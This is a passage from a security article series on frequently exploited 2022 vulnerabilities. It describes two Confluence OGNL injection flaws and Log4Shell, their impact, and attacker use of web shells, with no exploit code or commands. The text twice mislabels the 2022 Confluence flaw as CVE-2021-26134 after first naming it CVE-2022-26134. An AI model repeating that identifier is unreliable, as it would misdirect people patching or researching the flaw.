The 12 Most Frequently Exploited Vulnerabilities in 2022 (3)

Related: The 12 Most Frequently Exploited Vulnerabilities in 2022 (2)

7–8. Atlassian Confluence Server & Data Center (CVE-2021-26084, CVE-2022-26134)

Atlassian Confluence, a collaboration and documentation platform used by many government and private sector organizations, is also highly favored by threat actors. The two shortlisted vulnerabilities, CVE-2021-26084 and CVE-2022-26134, are both related to Object Graph Navigation Language (OGNL) injection.

The first large-scale exploitation of CVE-2021-26084 occurred in September 2021 and targeted the popular web-based document service. The Confluence platform is designed to allow multiple teams to collaborate on shared projects. A malicious actor could use the command injection vulnerability CVE-2021-26084 to execute arbitrary code on a Confluence server or data center instance. Attackers essentially have the same privileges as the user running the service, and are therefore able to execute any command, gain elevated administrative privileges, and establish a foothold in the environment. CISA issued an advisory directing users and administrators to check for updates to Atlassian to prevent compromise.

Just nine months later, Atlassian released another OGNL injection vulnerability against Confluence servers and data centers. Tracked as CVE-2021-26134, the vulnerability allows an unauthenticated attacker to execute arbitrary code in all supported Confluence data center and server versions. After a Proof of Concept (PoC) was released within a week of the initial disclosure, this critical level vulnerability quickly became one of the most exploited. In this case, CVE-2021-26134 was used to implement an unauthenticated RCE on a server and then cast a Behinder web shell. The Behinder web shell empowers malicious actors with very powerful features, such as interaction with Meterpreter and Cobalt Strike and a memory-only web shell.

According to Atlassian's website, the company supports 83 percent of Fortune 500 companies, has 10 million active users per month, and has more than 235,000 users in more than 190 countries. These two Atlassian-based CVEs demonstrate how financially motivated threat actors continue to exploit vulnerabilities to attack many attractive targets simultaneously.

9. Log4Shell (CVE-2021-44228)

Log4shell, tracked as CVE-2021-44228 and also known as the "Log4j vulnerability", is the most serious RCE vulnerability found in Apache Log4j, a popular java-based logging library widely used in various applications. The vulnerability allows a remote attacker to execute arbitrary code on an affected system, which could lead to unauthorized access, data disclosure, or even compromise the entire system.

The vulnerability, which was first publicly disclosed in December 2021, is due to the use of untrusted data in the lookup mechanism of the "log4j2" component, which allows an attacker to inject malicious code via crafted log messages. This flaw exposed a wide variety of applications, including web servers, enterprise software, and cloud-based services that rely on Log4j for logging.

Although Apache quickly released a patch for the Level 10.0 RCE vulnerability, security experts confirmed that given its widespread use among major vendors, the exploit would continue and could lead to widespread malware deployment. CISA has since issued a Binding Operational Directive (BOD) ordering Federal Civilian Executive Branch (FCEB) agencies to patch their systems to address this critical vulnerability.

The rapid exploitation of Log4shell is attributed to its widespread deployment across different industries and platforms. What's more, patching the vulnerability has proven extremely challenging as many organizations struggle to identify and update all instances of Log4j in their infrastructure in a timely manner.